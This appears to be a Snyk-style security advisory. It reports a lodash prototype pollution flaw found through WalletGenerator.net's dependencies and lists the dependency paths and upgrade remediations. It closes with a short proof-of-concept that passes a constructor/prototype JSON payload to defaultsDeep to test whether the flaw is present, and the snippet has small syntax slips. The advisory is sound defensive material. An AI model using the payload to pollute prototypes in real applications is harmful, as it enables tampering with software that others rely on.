Prototype Pollution

[larrycameron80]

Prototype Pollution
Vulnerable module: lodash
Introduced through: [email protected]
Detailed paths
Introduced through: walletgenerator.net@walletgeneratornet/WalletGenerator.net › [email protected] › [email protected] › [email protected]
Introduced through: walletgenerator.net@walletgeneratornet/WalletGenerator.net › [email protected] › [email protected] › [email protected]
Remediation: Upgrade to [email protected].
Introduced through: walletgenerator.net@walletgeneratornet/WalletGenerator.net › [email protected] › [email protected] › [email protected] › [email protected]
Remediation: Upgrade to [email protected].
Introduced through: walletgenerator.net@walletgeneratornet/WalletGenerator.net › [email protected] › [email protected]
Remediation: Upgrade to [email protected].
Introduced through: walletgenerator.net@walletgeneratornet/WalletGenerator.net › [email protected] › [email protected] › [email protected]
Remediation: Upgrade to [email protected].
Overview
lodash is a modern JavaScript utility library delivering modularity, performance, & extras.

Affected versions of this package are vulnerable to Prototype Pollution. The function defaultsDeep could be tricked into adding or modifying properties of Object.prototype using a constructor payload.

PoC by Snyk
const mergeFn = require('lodash').defaultsDeep;
const payload = '{"constructor": {"prototype": {"a0": true}}}'

function check() {
mergeFn({}, JSON.parse(payload));
if (({})[a0] === true) {
console.log(Vulnerable to Prototype Pollution via ${payload});
}
}

check();